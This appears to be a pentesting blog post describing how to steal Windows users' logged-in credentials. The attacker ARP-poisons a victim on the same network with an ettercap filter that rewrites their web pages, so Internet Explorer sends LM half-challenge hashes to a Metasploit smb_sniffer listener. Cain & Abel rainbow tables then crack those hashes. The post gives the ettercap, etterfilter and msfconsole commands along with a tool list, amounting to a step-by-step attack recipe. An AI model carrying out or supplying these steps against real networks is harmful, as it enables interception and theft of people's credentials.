Grabbing LM challenges with an ettercap filter
hack-fu by: bob So… this is an amalgamtion of several ideas and bits of work I’ve found floating around that I put together. The result is a handy pentesting/pwnage technique. The following blog that kicked this idea off discusses a modified Metasploit exploit module called smb_server.pm by Kurt Grutzmacher: NTLMv1, Metasploit and You. Around the same time I’d been playing with some ettercap filters, based on the below work at Irongeek: Fun with Ettercap Filters. These two sparked something and gave me a use of those huge LMHALFCHALLENGE rainbow tables I’d downloaded.
Goal:
To retreive a client’s currently logged in credentials through manipulation of their HTTP stream (via a MITM attack). Most of the clients seen during various internal tests were pretty well firewalled and patched. However by manipulating a client’s HTTP stream it was possible to have them send their username and the majority of their password hash.
Conditions:
So as with most things there are some conditions that must be inplace for this to be successful and also requirements that the credential snarfer must have sorted. Client Conditions:-:
- The target client must be using a version of IE for their browsing. During testing IE appears to be the only browser that by default sends through the resonse to the challenge of the locally logged in user that we’re after.
- Must be on same netowrk segment, for the MITM attack to work of course.
- Only LANMAN hashes can be obtained this way. If the client has been configured to support NTLM only then we lose. Most default installs will not be set up this way, you may encounter more secure setups in some corporate environments.
- Only the first 7 characters are in the tables. Youll have to brute force the rest of the password.
Attacker’s Rig:
- Some LMHALFCHALL rainbow tables: halflmchall_all-space_1-7.torrent (54gig) -or- halflmchall_alpha-numeric_1-7.torrent (5gig)
- Metasploit, plus Kurt Grutzmacher’s exploit module smb_server.pm from here (this does not work on Windows):
- http://metasploit.com/tools/: Looking for Framework v.2.7
- smb_sniffer.pm
- Ettercap plus an ettercap filter to rewrite the victims web pages LMHC_etter.filter.
- Cain & Abel to perform the crypt analysis of the LMHALFCHALLENGE hashes recovered. As far as I know these rainbow tables for LMHC were created with the Cain & Abel utility winrtgen and therefore are incompatible with the patched version of rcrack.
Attacker Process:
- Fix up the IP address in the
LMHC_etter.filterfile to represent the host you’ll be running Metasploit 2.7 & the smbsniffer exploit module from. - Compile that with:
etterfilter.exe -o LMHC_etter.ef LMHC_etter.filter
- Unpack Metasploit 2.7 from tha above link, place
smb_sniffer.pmunder the exploits/ directory. - Install and run as root
- Metasploit commands :
framework-2.7 $ sudo ./msfconsole msf > use smb_sniffer msf smb_sniffer > set PWFILE=/tmp/smb_sniffed.pw3
So the SMBsniffer is waiting listening for connections fro the victims IE. So we need to rewrite some of their web requests to ensure they pass us their LMHALFCHALLENGE hashes.
- Run up ettercap using our compiled filter from earlier, to perfom the arp poisoning attack with the following:
ettercap -Tq -M arp:remote -F /mnt/LMHC_etter.ef /GATEWAY ADDRESS/ /VICTIM ADDRESS/
- When the page gets rewritten correctly IE will attempt to make the connection and send the logged in user credentials to your waiting server.
- Resulting in a Pwdump compliant output file called
smb_sniffed.pw3 - Switch to Cain & Abel for the hash cracking
- Select the hash you want to crack, right click and select Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, add the tables, and crack it.
Some Other Things To Play With In The Same Eenvironment:
LSO: MSFweb 3.0 part 2 (via Milw0rm videos)
